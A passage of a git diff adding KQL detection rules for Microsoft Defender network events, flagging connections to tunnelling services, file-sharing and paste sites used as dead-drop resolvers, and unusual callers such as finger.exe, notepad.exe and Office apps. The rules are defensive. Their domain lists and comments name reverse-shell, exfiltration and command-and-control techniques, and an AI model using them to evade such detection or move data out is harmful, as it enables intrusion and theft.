+| where RemoteUrl endswith "azurewebsites.net" and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and InitiatingProcessFolderPath endswith "\\Discord.exe") or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_btunnels_domains.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_btunnels_domains.kql
new file mode 100644
index 00000000..fac0a202
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_btunnels_domains.kql
@@ -0,0 +1,13 @@
+// Title: Network Connection Initiated To BTunnels Domains
+// Author: Kamran Saifullah
+// Date: 2024-09-13
+// Level: medium
+// Description: Detects network connections to BTunnels domains initiated by a process on the system.
+// Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
+// False Positives:
+//   - Legitimate use of BTunnels will also trigger this.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith ".btunnel.co.in"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_cloudflared_tunnels_domains.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_cloudflared_tunnels_domains.kql
new file mode 100644
index 00000000..c3702834
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_cloudflared_tunnels_domains.kql
@@ -0,0 +1,13 @@
+// Title: Network Connection Initiated To Cloudflared Tunnels Domains
+// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-05-27
+// Level: medium
+// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system.
+// Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
+// False Positives:
+//   - Legitimate use of cloudflare tunnels will also trigger this.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith ".v2.argotunnel.com" or RemoteUrl endswith "protocol-v2.argotunnel.com" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "update.argotunnel.com"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_devtunnels_domain.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_devtunnels_domain.kql
new file mode 100644
index 00000000..1a096444
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_devtunnels_domain.kql
@@ -0,0 +1,12 @@
+// Title: Network Connection Initiated To DevTunnels Domain
+// Author: Kamran Saifullah
+// Date: 2023-11-20
+// Level: medium
+// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567.001, attack.t1572
+// False Positives:
+//   - Legitimate use of Devtunnels will also trigger this.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith ".devtunnels.ms"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_mega_nz.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_mega_nz.kql
new file mode 100644
index 00000000..bcb89fe0
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_mega_nz.kql
@@ -0,0 +1,13 @@
+// Title: Network Connection Initiated To Mega.nz
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-06
+// Level: low
+// Description: Detects a network connection initiated by a binary to "api.mega.co.nz".
+// Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567.002
+// False Positives:
+//   - Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
new file mode 100644
index 00000000..77c83489
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
@@ -0,0 +1,12 @@
+// Title: Network Connection Initiated To Visual Studio Code Tunnels Domain
+// Author: Kamran Saifullah
+// Date: 2023-11-20
+// Level: medium
+// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
+// False Positives:
+//   - Legitimate use of Visual Studio Code tunnel will also trigger this.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith ".tunnels.api.visualstudio.com"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql
new file mode 100644
index 00000000..4f4f0ae3
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql
@@ -0,0 +1,15 @@
+// Title: Network Connection Initiated via Finger.EXE
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-19
+// Level: high
+// Description: Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
+// In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
+// Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
+// Investigating such network connections can also help identify potential malicious infrastructure used by threat actors
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.004, attack.execution, attack.t1059.003
+// False Positives:
+//   - Unlikely
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\finger.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_via_notepad_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_via_notepad_exe.kql
new file mode 100644
index 00000000..60cad49f
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_via_notepad_exe.kql
@@ -0,0 +1,14 @@
+// Title: Network Connection Initiated Via Notepad.EXE
+// Author: EagleEye Team
+// Date: 2020-05-14
+// Level: high
+// Description: Detects a network connection that is initiated by the "notepad.exe" process.
+// This might be a sign of process injection from a beacon process or something similar.
+// Notepad rarely initiates a network communication except when printing documents for example.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1055
+// False Positives:
+//   - Printing documents via notepad might cause communication with the printer via port 9100 or similar.
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql b/KQL/rules/windows/network_connection/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql
new file mode 100644
index 00000000..5feed99f
--- /dev/null
+++ b/KQL/rules/windows/network_connection/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql
@@ -0,0 +1,14 @@
+// Title: New Connection Initiated To Potential Dead Drop Resolver Domain
+// Author: Sorina Ionescu, X__Junior (Nextron Systems)
+// Date: 2022-08-17
+// Level: high
+// Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.
+// In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1102.001
+// False Positives:
+//   - One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender.
+//   - Ninite contacting githubusercontent.com
+
+DeviceNetworkEvents
+| where (RemoteUrl endswith ".t.me" or RemoteUrl endswith "4shared.com" or RemoteUrl endswith "abuse.ch" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "cloudflare.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "discord.com" or RemoteUrl endswith "docs.google.com" or RemoteUrl endswith "drive.google.com" or RemoteUrl endswith "dropbox.com" or RemoteUrl endswith "dropmefiles.com" or RemoteUrl endswith "facebook.com" or RemoteUrl endswith "feeds.rapidfeeds.com" or RemoteUrl endswith "fotolog.com" or RemoteUrl endswith "ghostbin.co/" or RemoteUrl endswith "githubusercontent.com" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "imgur.com" or RemoteUrl endswith "livejournal.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onedrive.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "reddit.com" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "steamcommunity.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "technet.microsoft.com" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "twitter.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "vimeo.com" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "wetransfer.com" or RemoteUrl endswith "workers.dev" or RemoteUrl endswith "youtube.com") and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or ((RemoteUrl endswith "discord.com" or RemoteUrl endswith "cdn.discordapp.com") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and InitiatingProcessFolderPath endswith "\\Discord.exe") or (RemoteUrl endswith "dropbox.com" and (InitiatingProcessFolderPath endswith "\\Dropbox.exe" or InitiatingProcessFolderPath endswith "\\DropboxInstaller.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (RemoteUrl endswith "drive.google.com" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Google\\Drive File Stream\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Google\\Drive File Stream\\") and InitiatingProcessFolderPath endswith "GoogleDriveFS.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or ((RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz") and (InitiatingProcessFolderPath endswith "\\MEGAsync.exe" or (InitiatingProcessFolderPath contains "\\MEGAsyncSetup32_" and InitiatingProcessFolderPath contains "RC.exe") or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup32.exe" or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup64.exe" or InitiatingProcessFolderPath endswith "\\MEGAupdater.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\midori-ng\\" and InitiatingProcessFolderPath endswith "\\Midori Next Generation.exe") or isnull(InitiatingProcessFolderPath) or (RemoteUrl endswith "onedrive.com" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath endswith "\\OneDrive.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (RemoteUrl endswith ".t.me" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\Telegram Desktop\\" and InitiatingProcessFolderPath endswith "\\Telegram.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\")) or (RemoteUrl endswith "facebook.com" and InitiatingProcessFolderPath endswith "\\WhatsApp.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/office_application_initiated_network_connection_over_uncommon_ports.kql b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_over_uncommon_ports.kql
new file mode 100644
index 00000000..6bf2b8c2
--- /dev/null
+++ b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_over_uncommon_ports.kql
@@ -0,0 +1,12 @@
+// Title: Office Application Initiated Network Connection Over Uncommon Ports
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-12
+// Level: medium
+// Description: Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control
+// False Positives:
+//   - Other ports can be used, apply additional filters accordingly
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemotePort in~ ("53", "80", "139", "389", "443", "445", "3268")) or ((RemotePort in~ ("143", "465", "587", "993", "995")) and InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/office_application_initiated_network_connection_to_non_local_ip.kql b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_to_non_local_ip.kql
new file mode 100644
index 00000000..be91f7d9
--- /dev/null
+++ b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_to_non_local_ip.kql
@@ -0,0 +1,16 @@
+// Title: Office Application Initiated Network Connection To Non-Local IP
+// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-10
+// Level: medium
+// Description: Detects an office application (Word, Excel, PowerPoint)  that initiate a network connection to a non-private IP addresses.
+// This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.
+// This rule will require an initial baseline and tuning that is specific to your organization.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203
+// False Positives:
+//   - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.
+//   - Office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com" may have to be tuned.
+//   - It is highly recommended to baseline your activity and tune out common business use cases.
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemoteUrl endswith ".deploy.static.akamaitechnologies.com" and RemotePort == 443 and Protocol =~ "tcp") or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ((ipv4_is_in_range(RemoteIP, "13.107.4.0/22") or ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.42.0/23") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.35.224.0/20") or ipv4_is_in_range(RemoteIP, "23.53.40.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "23.216.76.0/22") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::153/128")) and (RemotePort in~ ("80", "443"))) or ((ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::153/128")) and (RemotePort in~ ("143", "587", "993", "995")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 443) or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 25) or (ipv4_is_in_range(RemoteIP, "2.16.56.0/23") or ipv4_is_in_range(RemoteIP, "2.17.248.0/21") or ipv4_is_in_range(RemoteIP, "13.107.240.0/21") or ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "23.61.224.0/20") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "23.3.88.0/22") or ipv4_is_in_range(RemoteIP, "23.216.132.0/22") or ipv4_is_in_range(RemoteIP, "40.76.0.0/14") or 